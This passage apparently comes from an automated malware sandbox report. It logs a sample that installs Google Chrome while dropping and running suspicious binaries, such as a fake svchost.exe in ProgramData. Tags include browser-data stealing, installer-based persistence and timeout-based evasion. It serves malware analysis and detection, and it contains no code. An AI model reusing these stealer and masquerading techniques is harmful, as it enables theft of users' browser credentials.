File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ca.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_nl.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_ro.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\hr.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\ml.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\chrome.exe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_fr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\nacl_irt_x86_64.nexe C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\chrome.VisualElementsManifest.xml C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_hu.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_lt.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sr.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\es-419.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\sw.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_200_percent.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\default_apps\external_extensions.json C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\mojo_core.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\bg.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\Locales\de.pak C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\chrome_elf.dll C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_kn.dll C:\ProgramData\setup\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_kn.dll C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source1908_108397436\Chrome-bin\109.0.5414.120\VisualElements\LogoDev.png C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76bc0f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD38.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76bc12.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC077.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76bc12.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76bc0f.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBC6C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBD97.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBE24.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBEA2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\setup\aa.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\setup\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\ProgramData\NVIDIARV\svchost.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\Elevation\IconReference = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.312\\goopdate.dll,-1004" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.svg C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
